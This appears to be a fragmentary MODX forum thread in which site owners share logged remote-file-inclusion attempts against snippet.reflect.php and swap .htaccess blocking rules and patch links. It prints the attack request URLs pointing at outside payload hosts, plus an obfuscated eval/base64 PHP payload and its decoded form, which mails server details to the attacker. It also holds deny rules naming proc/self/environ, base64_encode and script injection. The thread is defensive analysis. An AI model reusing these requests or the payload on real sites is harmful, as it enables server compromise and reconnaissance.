WHOIS: 203.81.175.XXX - MM (Myanmar) - Firefox
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=h\ttp://ygnutd.com/vnc/x/david.txt??
I always e-mail them:
1. How many sites do you hack per month?And hope for answer. I haven't been lucky but others have got replies and had a dialogue.]]>
2. Do you attack sites personally or just random.
3. Are you aware that by the info I have gathered you could be traced by police!?
WHOIS: 178.63.59.XXX - Hxxxxxx Online AG - DE - Germany
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=ht\tp://www.eurotechindia.org/portal/conf/1.txt??\?
CONTENT:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
eval(base64_decode("JGNyZWF0b3IgPSBiYXNlNjRfZGVjb2RlKCJZM3BpWlhKQWVXRm9iMjh1WTI5dCIpOw0KKCRzYWZlX21vZGUpPygkc2FmZW1vZGU9Ik9OIik6KCRzYWZlbW9kZT0iT0ZGIik7DQokYmFzZT0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyANCiRuYW1lID0gcGhwX3VuYW1lKCk7DQokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7DQokaG9zdCA9IGdldGhvc3RieWFkZHIoJF9TRVJWRVJbUkVNT1RFX0FERFJdKTsNCiRzdWJqID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOyANCiRtc2cgPSAiXG5CQVNFOiAkYmFzZVxudW5hbWUgLWE6ICRuYW1lXG5JUDogJGlwXG5Ib3N0OiAkaG9zdFxuJHB3ZHNcbiI7DQokZnJvbSA9IkZyb206IE1PREVfPSIuJHNhZmVtb2RlLiI8dG9vbEAiLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4iPiI7DQptYWlsKCAkY3JlYXRvciwgJHN1YmosICRtc2csICRmcm9tKTs="));
?>Decoding - http://www.opinionatedgeek.com/dotnet/tools/base64decode/
CONTENT:
<?
$creator = base64_decode("Y3piZXJAeWFob28uY29t");
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="ht\tp://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);
?>Decoding $creator = "[email protected]"
He did receive an e-mail from me. But I was in charge of the content of that e-mail.]]>
-> http://wiki.modxcms.com/index.php/Spamproofing_for_Jot
accesscontrol.inc.php hack for manager login
http://modxcms.com/forums/index.php/topic,59146.msg337312.html#msg337312]]>
http://docs.joomla.org/Htaccess_examples_(security)
@susan http://modxcms.com/forums/index.php/topic,40576.msg307614.html#msg307614]]>
what does it exactly?]]>
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)(reflect\.php|contact\.php)(.*) [NC,OR]
RewriteCond %{QUERY_STRING} proc/self/environ [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ /blackhole/index.php? [R,L]
]]>
Ditto htmlspecialchars/array error fix
http://modxcms.com/forums/index.php/topic,53353.msg308812.html#msg308812
manager/media/ImageEditor/editor.php vulnerability & patch
http://packetstormsecurity.org/1008-exploits/modx-xssxsrf.txt
**back up your site NOW**
]]>